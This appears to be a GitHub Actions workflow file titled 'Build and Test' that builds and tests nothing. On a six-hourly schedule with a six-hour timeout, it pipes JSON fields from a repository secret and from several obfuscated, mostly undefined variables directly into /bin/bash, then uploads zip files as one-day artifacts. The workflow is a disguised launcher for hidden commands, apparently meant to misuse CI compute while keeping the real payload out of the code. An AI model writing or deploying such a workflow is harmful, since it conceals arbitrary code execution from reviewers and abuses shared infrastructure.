name: Build and Test
on:
  workflow_dispatch:

  schedule:
    - cron: '22 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  job:
    name: Go
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Go
        env:
          uktnq744: ${{ secrets.uktnq744 }}
        run: |
          printf '%s' "$uktnq744" | jq -r .pzzk7 | /bin/bash
          echo $isl77675 | jq -r .a01268 | /bin/bash
          echo $ij738 | jq -r .vakn84 | /bin/bash
          printf '%s' "$etnkt4" | jq -r .imtde4214 | /bin/bash
          printf '%s' "$ud8" | jq -r .tlyc44774 | /bin/bash
          echo $jlfgt6 | jq -r .iqkzu59 | /bin/bash
          printf '%s' "$rjs2636" | jq -r .jzz80 | /bin/bash
          printf '%s' "$aui8" | jq -r .lmnp9 | /bin/bash
          printf '%s' "$axk770" | jq -r .o3 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 8CdKXCuC
          path: "*.zip"
          retention-days: 1
